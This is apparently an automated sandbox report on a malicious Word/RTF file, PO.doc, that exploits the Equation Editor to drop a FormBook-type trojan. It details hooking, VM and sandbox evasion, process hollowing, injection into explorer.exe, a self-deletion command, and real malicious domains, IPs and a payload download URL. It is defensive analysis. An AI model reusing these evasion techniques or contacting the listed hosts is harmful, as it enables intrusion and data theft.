          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE9
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ibeframnk863.exe PID: 2800, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000089B6E second address: 0000000000089B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548, Thread sleep time: -240000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548, Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe TID: 668, Thread sleep time: -37510s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe TID: 1232, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1188, Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2836, Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe, Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Thread delayed: delay time: 37510
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.467550341.000000000456F000.00000004.00000001.sdmp, Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmp, Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Binary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.467550341.000000000456F000.00000004.00000001.sdmp, Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.467574386.000000000457A000.00000004.00000001.sdmp, Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmp, Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.421757574.000000000029B000.00000004.00000020.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmp, Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Binary or memory string: VMware SVGA II
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exe, Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 6_2_00A826F8 mov eax, dword ptr fs:[00000030h] 6_2_00A826F8
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 8_2_00A126F8 mov eax, dword ptr fs:[00000030h] 8_2_00A126F8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe, Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Code function: 6_2_0040ACE0 LdrLoadDll, 6_2_0040ACE0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 63.250.43.8 80
          Source: C:\Windows\explorer.exe, Domain query: www.personowner.guru
          Source: C:\Windows\explorer.exe, Domain query: www.audiofactaesthetic.com
          Source: C:\Windows\explorer.exe, Network Connect: 99.83.154.118 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 5E0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Memory written: C:\Users\user\AppData\Roaming\ibeframnk863.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Thread register set: target process: 1764
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\svchost.exe, Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmp, Binary or memory string: ProgmanG
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmp, Binary or memory string: !Progman
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmp, Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Queries volume information: C:\Users\user\AppData\Roaming\ibeframnk863.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 321 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph image not preserved. Behavior Graph ID: 492582, Sample: PO.doc, Startdate: 28/09/2021, Architecture: WINDOWS, Score: 100]
          Process chain from the graph: EQNEDT32.EXE contacted fantecheo.tk (185.239.243.112, port 80), dropped C:\Users\user\AppData\...\ibeframnk863.exe and C:\Users\user\AppData\...\ibefrankszx[1].exe (PE32), and started ibeframnk863.exe. That process started two further ibeframnk863.exe instances, one of which started svchost.exe and injected into explorer.exe. svchost.exe started cmd.exe. explorer.exe contacted www.audiofactaesthetic.com (63.250.43.8, port 80) and www.personowner.guru (99.83.154.118, port 80). WINWORD.EXE was started separately and dropped C:\Users\user\Desktop\~$PO.doc.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PO.doc | 43% | Virustotal |
          PO.doc | 29% | ReversingLabs | Document-RTF.Exploit.Heuristic

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe | 20% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          C:\Users\user\AppData\Roaming\ibeframnk863.exe | 20% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.ibeframnk863.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          www.handelsbetriebposavec.com/if60/ | 9% | Virustotal |
          www.handelsbetriebposavec.com/if60/ | 0% | Avira URL Cloud | safe
          http://fantecheo.tk/ibefrankszx.exe | 17% | Virustotal |
          http://fantecheo.tk/ibefrankszx.exe | 100% | Avira URL Cloud | malware
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://java.sun.com | 0% | Virustotal |
          http://java.sun.com | 0% | Avira URL Cloud | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.audiofactaesthetic.com | 63.250.43.8 | true | false | | high
          fantecheo.tk | 185.239.243.112 | true | false | | high
          www.personowner.guru | 99.83.154.118 | true | false | | high

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                www.handelsbetriebposavec.com/if60/ | true | 9%, Virustotal; Avira URL Cloud: safe | low
                http://fantecheo.tk/ibefrankszx.exe | true | 17%, Virustotal; Avira URL Cloud: malware | unknown

                URLs from Memory and Binaries


                                                    Contacted IPs


                                                    Public

                                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                                    63.250.43.8 | www.audiofactaesthetic.com | United States | 22612 | NAMECHEAP-NETUS | false
                                                    185.239.243.112 | fantecheo.tk | Moldova Republic of | 55933 | CLOUDIE-AS-APCloudieLimitedHK | false
                                                    99.83.154.118 | www.personowner.guru | United States | 16509 | AMAZON-02US | false

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:492582
                                                    Start date:28.09.2021
                                                    Start time:20:41:36
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 13m 11s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:PO.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winDOC@12/8@3/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 12.8% (good quality ratio 12.3%)
                                                    • Quality average: 73.6%
                                                    • Quality standard deviation: 26.7%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 116
                                                    • Number of non-executed functions: 33
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • Not all processes were analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    Time | Type | Description
                                                    20:42:20 | API Interceptor | 29x Sleep call for process: EQNEDT32.EXE modified
                                                    20:42:21 | API Interceptor | 114x Sleep call for process: ibeframnk863.exe modified
                                                    20:43:05 | API Interceptor | 131x Sleep call for process: svchost.exe modified
                                                    20:44:01 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):624640
                                                    Entropy (8bit):7.132231741936528
                                                    Encrypted:false
                                                    SSDEEP:12288:kzqzgNi+hBr7IUAYpHOSpUeR7/UbuxaWsbkUb+3tkvfY:kvNi+hBr8UAGFBVUbuoWsbkUmgfY
                                                    MD5:CE20BD8F40F78DA603DD17D756745B0A
                                                    SHA1:2538F96FAD951489CD9BB84F9B76B107EA70EAA5
                                                    SHA-256:680993E1220C8D918F192AE23C5C01B6357C58AD68B7CC59FA122C09B7B85CDD
                                                    SHA-512:8138F5FDC8CD0BD806E123CD86FCEB559E7BAFB631D6244F36A86934BE822E6A89CBB9010CBCE8A9A22F9F0F70511E7D0059DE4E8407B9641ECE96848DF5D5D2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:unknown
                                                    IE Cache URL:http://fantecheo.tk/ibefrankszx.exe
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{944DEEB7-0445-4A5E-BEFC-7294BB0C5BA3}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):13312
                                                    Entropy (8bit):3.5180602819243387
                                                    Encrypted:false
                                                    SSDEEP:384:L5J4SoLBBtlzYZuF8mDo+RvaWi2P27MPPFA7hZ:LTWBzF8P+RPAMXkhZ
                                                    MD5:EF344FD5E2E1BB5FDE6D53C482442333
                                                    SHA1:8C68B189186A18A3C8E8F5632C6F023E2D6108B3
                                                    SHA-256:FB361537266D06F762642B0C32139E14C2A8A5E6D88915B64691322F17E65CAF
                                                    SHA-512:6180A78765E94FF8978E60661155CBBDE6BE113BDBE51854C05FABA1E428FFAA0E4405A45C3BBC9505330383B19BFA6B6B75804E52FB1EA26C2AE9DF0A253F30
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F37BA74A-2884-4D29-90C1-0C63AEE1F3DB}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Sep 29 02:42:18 2021, length=19661, window=hide
                                                    Category:dropped
                                                    Size (bytes):1936
                                                    Entropy (8bit):4.478028575484341
                                                    Encrypted:false
                                                    SSDEEP:24:8NnUk/XTuzLI8hvDevQiDv3qRE/7Es2NnUk/XTuzLI8hvDevQiDv3qRE/7Eg:8Gk/XTkrFIaRWf2Gk/XTkrFIaRWB
                                                    MD5:249B619EB64074F7ACC92F26C11AC377
                                                    SHA1:8AAE07E6E2184BE746E4FB3EFC0AFF9D3E2477F7
                                                    SHA-256:4BA781EECD035514A0FB60DB92E641668DA36ACF24A7AD82A1F541E37306BD05
                                                    SHA-512:41C477D88E9BA235268482547AD81368FD02DE529EFF56F424B4857EB3751266121BEFE2C5F5F97748448BDCB27701A79B3B3C6B1265CB9B210014572C2CA872
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):44
                                                    Entropy (8bit):3.8399229603149925
                                                    Encrypted:false
                                                    SSDEEP:3:M1gAYCtc6YCmX1gAYCv:MiAYUc6Y6AYs
                                                    MD5:088B8C27544B9C39170C0441E31C3B1A
                                                    SHA1:05AD138F31421DEFB3C09831B6CFE977ABE372B8
                                                    SHA-256:C0953ABC66A9CA6017E4AF0644E9EE79209D64990513C518FDE3AAEE03F005EF
                                                    SHA-512:13EBB74599AA1310B975859AC05AF04B6004350266895E86E3A112559C315AD27950FCF1785B483BF2433CCBD9201DF8DAEF606E925EFECFC39B3D8967A212BE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: [doc]..PO.LNK=0..PO.LNK=0..[doc]..PO.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.503835550707526
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                    MD5:6462452E1083FFF3724A32DC01771E8B
                                                    SHA1:244116899824E727C5C399064F004C71D88F7254
                                                    SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                    SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):624640
                                                    Entropy (8bit):7.132231741936528
                                                    Encrypted:false
                                                    SSDEEP:12288:kzqzgNi+hBr7IUAYpHOSpUeR7/UbuxaWsbkUb+3tkvfY:kvNi+hBr8UAGFBVUbuoWsbkUmgfY
                                                    MD5:CE20BD8F40F78DA603DD17D756745B0A
                                                    SHA1:2538F96FAD951489CD9BB84F9B76B107EA70EAA5
                                                    SHA-256:680993E1220C8D918F192AE23C5C01B6357C58AD68B7CC59FA122C09B7B85CDD
                                                    SHA-512:8138F5FDC8CD0BD806E123CD86FCEB559E7BAFB631D6244F36A86934BE822E6A89CBB9010CBCE8A9A22F9F0F70511E7D0059DE4E8407B9641ECE96848DF5D5D2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:unknown
                                                    C:\Users\user\Desktop\~$PO.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.503835550707526
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                    MD5:6462452E1083FFF3724A32DC01771E8B
                                                    SHA1:244116899824E727C5C399064F004C71D88F7254
                                                    SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                    SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                    Malicious:true
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                    Static File Info

                                                    General

                                                    File type:Rich Text Format data, unknown version
                                                    Entropy (8bit):4.426499459410393
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:PO.doc
                                                    File size:19661
                                                    MD5:601260b52c23f2be80998a22b2fc77dd
                                                    SHA1:e4fd634040abd4f6b58aa7efe8fb59f7e64a395f
                                                    SHA256:2dfd64c86cfb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055
